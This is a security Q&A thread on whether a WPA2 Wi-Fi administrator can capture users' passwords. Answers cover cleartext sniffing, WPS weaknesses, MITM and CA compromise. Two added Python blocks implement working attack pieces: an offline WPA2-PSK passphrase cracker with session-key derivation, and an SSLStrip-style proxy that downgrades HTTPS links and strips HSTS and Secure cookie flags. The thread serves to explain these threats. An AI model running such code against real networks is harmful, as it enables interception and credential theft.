
Is it possible that the network administrator (of a WPA2 Wi-Fi network) can log all the data the users send and then get the password out of it?

I know it is not possible to get the password if I'm surfing with HTTPS, but what if I only use HTTP pages?


3 Answers


On any Wi-Fi network - encrypted or not, given today's Wi-Fi encryption protocols - any sufficiently skilled and equipped user of the network (and especially the network administrator) could easily access any data you transmit or receive via cleartext protocols. This includes usernames and passwords as well as web pages, documents, and other data sent or obtained via http, ftp, telnet, etc.

For open networks, gathering cleartext data is as easy as sniffing the traffic in the air. WEP security adds a slight barrier, but is still easily decipherable by even unauthenticated users.

WPA and WPA2 require a good bit more computational power for outsiders to crack, and much more time. For these, an attacker would most likely monitor traffic for a while and then take the data home for offline cracking. As with just about any cryptography, brute force will always win if given enough time. With WPA and WPA2, that just means a lot of time.

There are side-channel attacks on WPA and WPA2 though. Currently, the Wi-Fi Protected Setup (or similar) features in most SOHO routers have a weakness that will allow an attacker to gain access to your network in a fairly short time. Once they've cracked your key through this method, they can join the network like any other user (provided you don't have other protections - most of which are trivially bypassable - in place).

For WPA and WPA2, there are known weaknesses that allow authenticated users (or attackers who have broken into the network) to sniff traffic as if it were unprotected. At this point, the only defense you have is encryption at higher levels of the network stack (i.e.: HTTPS). Even then, many of these higher-level protocols can be subjected to man-in-the-middle (MitM) attacks if the victim is less than vigilant in verifying their SSL certificates (or the attacker has a certificate from a compromised CA).

The only real additional threat that a malicious network administrator would pose is that they have access to the wired side of the network also. On the wire, traffic is not protected by the same encryption (WEP/WPA/WPA2) that applies to the wireless connection. Anyone on the wire could then sniff your traffic as if it had been sent across an open (unprotected) network on the air.

  • and what if I use a VPN?
    – hanssii
    Commented Sep 8, 2011 at 17:41
  • @hanssii - Then you're no longer using a cleartext protocol, as far as the local network is concerned. However, any data you send over http, ftp, etc. is now instead at the mercy of the administrators of whatever network you've VPNed to.
    – Iszi
    Commented Sep 8, 2011 at 17:42
  • I think the comments about WPA and WPA2 are potentially misleading. Saying that they are crackable with sufficient computational power, while accurate in principle, may be misleading: as far as I know, if the password is unguessable, the amount of computational power required may exceed your expected life expectancy, or that of the universe. The known weaknesses in WPA2 (and, I presume, WPA) apply primarily if the attacker knows the crypto key: if the attacker doesn't know the keys, the password is strong, and the router doesn't have the WPS vulnerability, WPA2 is hard to crack.
    – D.W.
    Commented Mar 12, 2012 at 22:35
  • @D.W. Your statements are correct. However, the question was asking particularly if the network administrator may be able to sniff encrypted WiFi traffic. The network admin, by virtue of his role, will most likely have the PSK. Therefore he (as well as any other user joined to the WiFi network, and therefore also in possession of the PSK) will be able to take advantage of the WPA/WPA2 weaknesses I've mentioned.
    – Iszi
    Commented Jul 23, 2013 at 18:14
  • Is it possible to sniff a WPA2 protected wi-fi when you're not a user of it?
    – galmeida
    Commented Jul 15, 2017 at 1:15
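The two claims in this answer and its comments, that an outsider has to grind through an offline guessing attack on the captured handshake, while anyone who already holds the PSK can derive every other station's session key from the same handshake, can be shown in a few lines. The following is an added example, not code from the answer or from any tool mentioned above. It implements the WPA/WPA2-PSK key schedule from IEEE 802.11i (PBKDF2 for the PMK, the PRF for the PTK, HMAC-SHA1 for the EAPOL-Key MIC of handshake message 2) and runs it against a handshake that is constructed inline: the MAC addresses, nonces and the frame itself are made up for the example, the SSID "IEEE" is chosen because the PMK of "password" under it is a published 802.11i test vector, and the message 2 layout omits nothing but real key data beyond a minimal RSN element.

```python
import hashlib
import hmac
import struct

# All MAC addresses, nonces and the handshake frame below are constructed for the
# example; the key-derivation steps follow IEEE 802.11i (WPA/WPA2-PSK).


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK (the PSK) = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The 4096 iterations are the whole cost of an offline guess, so a strong passphrase makes
    brute force impractical, but they do nothing against someone who already holds the PSK."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..., cut to 64 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def wpa_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK and the four values anyone can read off the 4-way handshake.
    For CCMP: KCK = ptk[0:16], KEK = ptk[16:32], TK (the station's cipher key) = ptk[32:48]."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


MIC_OFFSET = 81  # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields precede the 16-byte MIC


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, EAPOL frame with MIC zeroed)[:16]."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, key_data: bytes) -> bytes:
    """Handshake message 2 (station -> AP) with the MIC field zeroed, laid out as in 802.11i."""
    body = (b"\x02"                       # key descriptor type: RSN
            + struct.pack(">H", 0x010A)   # key info: version 2 (HMAC-SHA1), pairwise, MIC present
            + struct.pack(">H", 0)        # key length (0 in message 2)
            + struct.pack(">Q", 1)        # replay counter
            + snonce                      # key nonce = SNonce
            + b"\x00" * 16                # key IV
            + b"\x00" * 8                 # key RSC
            + b"\x00" * 8                 # reserved
            + b"\x00" * 16                # MIC (filled in by the sender)
            + struct.pack(">H", len(key_data)) + key_data)
    return b"\x01\x03" + struct.pack(">H", len(body)) + body  # 802.1X v1, type EAPOL-Key


# Constructed capture. SSID "IEEE" is used because its PMK for "password" is a published test vector.
SSID = "IEEE"
AA = bytes.fromhex("001122334455")      # AP MAC (constructed)
SPA = bytes.fromhex("66778899aabb")     # station MAC (constructed)
ANONCE = bytes(range(32))               # constructed nonces
SNONCE = bytes(range(32, 64))
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP/PSK RSN element


def sign_msg2(passphrase: str) -> bytes:
    """What the real station puts on the air: message 2 carrying a valid MIC under its KCK."""
    ptk = wpa_ptk(wpa_pmk(passphrase, SSID), AA, SPA, ANONCE, SNONCE)
    frame = build_msg2(SNONCE, RSN_IE)
    return frame[:MIC_OFFSET] + eapol_mic(ptk[:16], frame) + frame[MIC_OFFSET + 16:]


CAPTURED_MSG2 = sign_msg2("password")   # the sniffer's copy; the passphrase itself never crosses the air


def crack_psk(ssid, aa, spa, anonce, snonce, msg2, wordlist):
    """Outsider's offline attack: one PBKDF2 + PRF + HMAC per candidate, checked against the captured MIC."""
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for guess in wordlist:
        ptk = wpa_ptk(wpa_pmk(guess, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], msg2), captured_mic):
            return guess
    return None


def station_tk(passphrase, ssid, aa, spa, anonce, snonce) -> bytes:
    """Insider's view: anyone holding the PSK who saw the handshake gets that station's CCMP key directly."""
    return wpa_ptk(wpa_pmk(passphrase, ssid), aa, spa, anonce, snonce)[32:48]


if __name__ == "__main__":
    print("PMK:", wpa_pmk("password", SSID).hex())
    print("cracked:", crack_psk(SSID, AA, SPA, ANONCE, SNONCE, CAPTURED_MSG2, ["letmein", "Password", "password"]))
    print("station TK:", station_tk("password", SSID, AA, SPA, ANONCE, SNONCE).hex())
```

`crack_psk` is what aircrack-ng or hashcat do at scale: the cost per guess is dominated by the 4096-iteration PBKDF2, which is why D.W.'s point holds for a long random passphrase and why the WPS hole matters so much (it hands over the PSK and skips the guessing entirely). `station_tk` is the other half of Iszi's point: the admin, or any joined user, already has the PSK, so the only thing between them and another station's unicast traffic is capturing that station's handshake, which the client happily repeats after a deauthentication.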

Iszi has good points on cleartext protocols; however, you can still attack as a MITM if the user is using HTTPS.

For example, if the administrator terminates the HTTPS on his side and you accept his faulty certificate, the administrator can then decrypt and view your requests in plaintext.

Tools like SSLStrip can also be useful when attacking HTTPS as a MITM. The only difference for the user is usually that a supposed HTTPS site is instead provided as HTTP. Would you notice?
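What SSLStrip actually does to a response is easy to miss from the one-line description above, so here is the rewriting half of the technique as an added example (this is not SSLStrip's code and not part of the answer). The victim speaks plain HTTP to the attacker's proxy; the proxy fetches the real site over HTTPS, then rewrites the reply so that nothing in it will ever push the browser back to HTTPS: links and `Location` redirects lose their `https://`, the `Strict-Transport-Security` header is dropped, and the `Secure` flag is stripped from cookies so they keep flowing over cleartext. The sample response and the hostname `bank.example` are constructed for the example; the socket handling and the upstream HTTPS fetch are left out.

```python
import re
from urllib.parse import urlsplit

# Constructed sample response (no real site); bank.example is a placeholder hostname.
SAMPLE_HEADERS = [
    ("Location", "https://bank.example/login"),
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("Set-Cookie", "session=abc123; Path=/; Secure; HttpOnly"),
    ("Content-Type", "text/html"),
]
SAMPLE_BODY = ('<a href="https://bank.example/login">Sign in</a>\n'
               '<form action="https://bank.example/auth" method="post">')

_HTTPS_URL = re.compile(r"https://[^\s\"'<>]+")


class SslStripProxy:
    """Bookkeeping half of an SSLStrip-style downgrade. The victim talks plain HTTP to the
    proxy; the proxy remembers which URLs it downgraded so it can fetch them over HTTPS itself."""

    def __init__(self):
        self.stripped = set()   # (host, path) pairs the victim now believes are plain http

    def _downgrade(self, match):
        url = match.group(0)
        parts = urlsplit(url)
        self.stripped.add((parts.netloc.lower(), parts.path or "/"))
        return "http://" + url[len("https://"):]

    def rewrite_body(self, body: str) -> str:
        """Every https:// link in the page becomes http://, so the victim's next click is cleartext."""
        return _HTTPS_URL.sub(self._downgrade, body)

    def rewrite_headers(self, headers):
        out = []
        for name, value in headers:
            key = name.lower()
            if key == "strict-transport-security":
                continue        # drop HSTS: the browser must never learn to insist on https
            if key == "location":
                value = self.rewrite_body(value)    # redirect-to-https becomes redirect-to-http
            elif key == "set-cookie":
                # without the Secure flag the browser will send the cookie over plain http
                value = re.sub(r";\s*secure\b", "", value, flags=re.I)
            out.append((name, value))
        return out

    def strip_response(self, headers, body):
        """Rewrite one upstream HTTPS response before handing it to the victim over HTTP."""
        return self.rewrite_headers(headers), self.rewrite_body(body)

    def upstream_scheme(self, host: str, path: str) -> str:
        """When the victim later asks for http://host/path, fetch it over https if we downgraded it."""
        return "https" if (host.lower(), path or "/") in self.stripped else "http"


if __name__ == "__main__":
    proxy = SslStripProxy()
    headers, body = proxy.strip_response(SAMPLE_HEADERS, SAMPLE_BODY)
    for name, value in headers:
        print(f"{name}: {value}")
    print()
    print(body)
    print("\nupstream for /login:", proxy.upstream_scheme("bank.example", "/login"))
```

The only thing the victim's browser can see is that the address bar says `http://` where it should say `https://`; the page content and the login form look identical. The attack fails when the browser already knows the site must be HTTPS (an HSTS entry learned on an earlier visit, or a preloaded one) or when the user types `https://` explicitly, because then the first request never goes out in cleartext for the proxy to intercept.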


I know it is not possible to get the password if I'm surfing with https ...

It is not possible if you only use authorized certificates. If you don't use these, there can be a man-in-the-middle, who just passes his own SSL certificate to you and reads the whole encrypted connection.

  • Or if someone hacks one of the trusted root CAs. But that's unlikely to happen; at least not more often than every 6 months or so. (Yup, DigiNotar's fake *.google.com certificates appeared "authorized"; and there was Comodo before that, and Etisalat.) Unfortunately, even "valid" SSL certificates, signed by a trusted root CA, are no guarantee of a secure connection nowadays.
    – Piskvor
    Commented Sep 9, 2011 at 12:51
  • @Piskvor - yes, this is a fundamental weakness in https (having to trust random CAs); guaranteed security doesn't exist. However, you should recognize that the server at the other end of the https connection is often an easier target than getting a trusted root CA certificate. (E.g., the attacker pays an admin to copy the actual certificate from /etc/ssl/private/, which is then used in the MITM attack.) However, the nice thing is that to get the certificate the attacker must have gotten root on their server and probably could get your private data off of it already.
    – dr jimbob
    Commented Mar 12, 2012 at 17:57
  • @dr jimbob: Sure, subverting an individual server should be harder than subverting a CA.
    Commented Mar 12, 2012 at 19:50
